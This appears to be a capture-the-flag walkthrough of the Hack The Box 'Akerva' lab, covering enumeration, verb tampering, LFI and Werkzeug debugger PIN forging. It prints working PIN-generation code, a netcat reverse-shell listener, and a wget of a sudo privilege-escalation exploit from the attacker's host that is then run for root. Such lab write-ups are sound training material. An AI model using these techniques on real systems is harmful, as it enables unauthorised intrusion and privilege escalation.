NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 22:34 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating Ping Scan at 22:34
Scanning 10.13.37.11 [4 ports]
Completed Ping Scan at 22:34, 0.43s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:34
Scanning akerva.htb (10.13.37.11) [1000 ports]
Discovered open port 22/tcp on 10.13.37.11
Discovered open port 80/tcp on 10.13.37.11
Discovered open port 5000/tcp on 10.13.37.11
Completed SYN Stealth Scan at 22:34, 5.96s elapsed (1000 total ports)
Initiating Service scan at 22:34
Scanning 3 services on akerva.htb (10.13.37.11)
Completed Service scan at 22:34, 25.70s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against akerva.htb (10.13.37.11)
Retrying OS detection (try #2) against akerva.htb (10.13.37.11)
Initiating Traceroute at 22:34
Completed Traceroute at 22:34, 0.30s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 22:34
Completed Parallel DNS resolution of 2 hosts. at 22:34, 0.19s elapsed
NSE: Script scanning 10.13.37.11.
Initiating NSE at 22:34
Completed NSE at 22:35, 11.72s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 1.69s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for akerva.htb (10.13.37.11)
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0d:e4:41:fd:9f:a9:07:4d:25:b4:bd:5d:26:cc:4f:da (RSA)
| 256 f7:65:51:e0:39:37:2c:81:7f:b5:55:bd:63:9c:82:b5 (ECDSA)
|_ 256 28:61:d3:5a:b9:39:f2:5b:d7:10:5a:67:ee:81:a8:5e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://10.13.37.11/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
5000/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
| http-auth:
| HTTP/1.0 401 UNAUTHORIZED\x0D
|_ Basic realm=Authentication Required
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Android 4.2.2 (Linux 3.4) (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 36.817 days (since Fri Jun 19 02:58:34 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 299.62 ms 10.13.14.1
2 299.73 ms akerva.htb (10.13.37.11)
NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.05 seconds
Raw packets sent: 1240 (57.962KB) | Rcvd: 1062 (45.946KB)
PORT 80
SOURCE – CODE
Here we go with our 1st flag:
AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts}
Now we will be searching for UDP PORT 161
Here to enumerate into SNMP service we are going to use this command
snmp-check 10.13.37.11 -c public -v 2c
Here we will save output in a file as we will be getting large number of data
OUTPUT:
<----->
1233 runnable cron /usr/sbin/CRON -f
1234 runnable cron /usr/sbin/CRON -f
1235 runnable sh /bin/sh -c /opt/check_backup.sh
1236 runnable sh /bin/sh -c /opt/check_devSite.sh
1237 runnable check_backup.sh /bin/bash /opt/check_backup.sh
1238 runnable check_devSite.s /bin/bash /opt/check_devSite.sh
1241 runnable backup_every_17 /bin/bash /var/www/html/scripts/backup_every_17minutes.sh AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
1242 runnable space_dev.py /usr/bin/python /var/www/html/dev/space_dev.py
1247 runnable python /usr/bin/python /var/www/html/dev/space_dev.py
<----->
Here we go with our 2nd flag
AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
Here we will see that we have something backup which we need to get but the thing is how as other files we will be trying to access will be denied. So here we will be sending the request through BURP.
Rather then Requesting for GET we will be going through POST
Here we go with the result and 3rd Flag
AKERVA{IKNoW###VeRbTamper!nG_==}
And the code looks like this which we got from POST request
#!/bin/bash
#
# This script performs backups of production and development websites.
# Backups are done every 17 minutes.
#
# AKERVA{IKNoW###VeRbTamper!nG_==}
#
SAVE_DIR=/var/www/html/backups
while true
do
ARCHIVE_NAME=backup_$(date +%Y%m%d%H%M%S)
echo "Erasing old backups..."
rm -rf $SAVE_DIR/*
echo "Backuping..."
zip -r $SAVE_DIR/$ARCHIVE_NAME /var/www/html/*
echo "Done..."
sleep 1020
done
What this code actually mean is that we got akerva.htb it will save backup in backups directory with the name as :
backup_[year mon date hour minute second]
Here we will be just using curl command to go through akerva.htb and we will be using flag –head cuz we need time when we curl as our machine time differs from its time. The output looks like this
┌─[root@liquid]─[~/Desktop/HTB/akervaC] └──╼ #curl http://akerva.htb --head HTTP/1.1 301 Moved Permanently Date: Sat, 25 Jul 2020 18:00:23 GMT Server: Apache/2.4.29 (Ubuntu) X-Pingback: http://10.13.37.11/xmlrpc.php X-Redirect-By: WordPress Location: http://10.13.37.11/ Content-Type: text/html; charset=UTF-8
So here we will be creating name for our backup file which we will be downloading afterwards
25 Jul 2020 18:00:23 >> backup_2020072518XXXX
Here I have used XXXX because we need to know minutes and seconds so to do that we will use 4 digit number wordlist to fuzz further time
COMMAND TO DO THAT:
┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #wfuzz -u http://akerva.htb/backups/backup_2020072518FUZZ.zip -w 4digit.txt --hc 404
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://akerva.htb/backups/backup_2020072518FUZZ.zip
Total requests: 10000
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000001630: 200 82522 810989 20937179 "1629"
L W Ch
000008014: 404 9 L 31 W 272 Ch "8013"
So here we will be just downloading the backup zip
wget http://akerva.htb/backup/backup20200725181629.zip
ENUMERATING VAR FOLDER
Here we have var folder which we will be enumerating from where we will get that script which we got from SNMP
┌─[root@liquid]─[~/Desktop/HTB/akervaC/var/www/html/dev]
└──╼ #cat space_dev.py
#!/usr/bin/python
from flask import Flask, request
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash
app = Flask(__name__)
auth = HTTPBasicAuth()
users = {
"aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
}
@auth.verify_password
def verify_password(username, password):
if username in users:
return check_password_hash(users.get(username), password)
return False
@app.route('/')
@auth.login_required
def hello_world():
return 'Hello, World!'
# TODO
@app.route('/download')
@auth.login_required
def download():
return downloaded_file
@app.route("/file")
@auth.login_required
def file():
filename = request.args.get('filename')
try:
with open(filename, 'r') as f:
return f.read()
except:
return 'error'
if __name__ == '__main__':
print(app)
print(getattr(app, '__name__', getattr(app.__class__, '__name__')))
app.run(host='0.0.0.0', port='5000', debug = True)
Here we go with our 4rth flag
AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}
Now if we see in the script we are give that we have username anhd password is hash sop lets try this flag as pass and aas as username on port 5000 where we were asked for user and pass
Here we see our text hello world
So we have seen in script that we have file directory where filename is taking value which looks like LFI
Lets try to get flag from aas folder and his ssh keys
Here we got our 5th flag
AKERVA{IKNOW#LFi_@_}
But we donot have have id_rsa key So we have got nothing as much.
After fuzzing we have console directory which is asking for pin
So we need pin If we check its home page name as
Werkzeug Debugger after google you will have exploit for this
So here we have script which needs Mac Address and Machine-id
which we can get through LFI which we got earlier
Here we will just use python to convert that mac address
>>> print(0x5056b96d18) 345052376344
Whole code looks like this
import hashlib
from itertools import chain
probably_public_bits = [
'aas',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]
private_bits = [
'345052376344', # str(uuid.getnode()), /sys/class/net/ens33/address
'258f132cd7e647caaf5510e3aca997c1' # get_machine_id(), /etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
We will be executing this code and we will get our pin
which we will use get something like this
Here in source code we came to know that we can execute python code so lets just execute python reverse shell
Here we will get our shell
┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.14.10] from (UNKNOWN) [10.13.37.11] 57478
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(aas) gid=1000(aas) groups=1000(aas),24(cdrom),30(dip),46(plugdev)
$ python -c 'import pty;pty.spawn("/bin/bash")'
aas@Leakage:~$ ls
ls
flag.txt
Here you will have hiddenflag in the same directory
aas@Leakage:~$ cat .hiddenflag.txt
cat .hiddenflag.txt
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
Here we go with our 6th flag
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
After searching and enumerating we will get nothing So we go version of sudo as when we su we get some text lets check that
aas@Leakage:/opt$ sudo --version sudo --version Sudo version 1.8.21p2 Sudoers policy plugin version 1.8.21p2 Sudoers file grammar version 46 Sudoers I/O plugin version 1.8.21p2
So if you google we will find exploit for this .
Here we will just clone this repo and compile it in our machine then do the following
aas@Leakage:/tmp$ wget http://10.13.14.10/exploit
wget http://10.13.14.10/exploit
--2020-07-25 16:40:37-- http://10.13.14.10/exploit
Connecting to 10.13.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17480 (17K) [application/octet-stream]
Saving to: ‘exploit’
exploit 100%[===================>] 17.07K 26.8KB/s in 0.6s
2020-07-25 16:40:39 (26.8 KB/s) - ‘exploit’ saved [17480/17480]
aas@Leakage:/tmp$ ls
ls
exploit
systemd-private-d387e08ebced48278578cfff30488f9b-apache2.service-FUVgpA
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-resolved.service-7xDcps
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-timesyncd.service-p8EwEw
vmware-root_625-4021587817
aas@Leakage:/tmp$ chmod +x exploit
chmod +x exploit
aas@Leakage:/tmp$ ./exploit
./exploit
[sudo] password for aas:
There's a lot of it about, you know.
# id
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(aas)
# cd /root
ls
cd /root
# ls
flag.txt secured_note.md
# cat flag.txt
cat flag.txt
AKERVA{IkNow_Sud0_sUckS!}
Here we go with our 7th flag
AKERVA{IkNow_Sud0_sUckS!}
Here we have some text in secrets file So lets just copy and decode it base64. after which we will use ouyr python tool hash identifier which will give you that it is VIGENER.
So here we will be using decode.fr to get this done but if we go directly we will get random letters so here we will be going to check for letters used in this string
GOAHGHEEGSAEEHACEGULREPEEECEOKMKERFSESFRLKERUKTSVPMSSNHSKRFFAGIAPVETCNMDLVFHDAOGFLAFGSKEULMVOOWWCAHCRFVVNVHVCMSYELSPMIHHMODAUKHE
Here we will see that we have some alphabets which are not used here
b,j,q,x,c
Here we string we need
Set of alphabets we need
string which will be present in flag is AKERVA
So with all this here we go
Here we go with our 8th flag
AKERVA{IKNOOOWVIGEEENERRRE}
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
Thanks, really intreresting!
Very nice, thanks.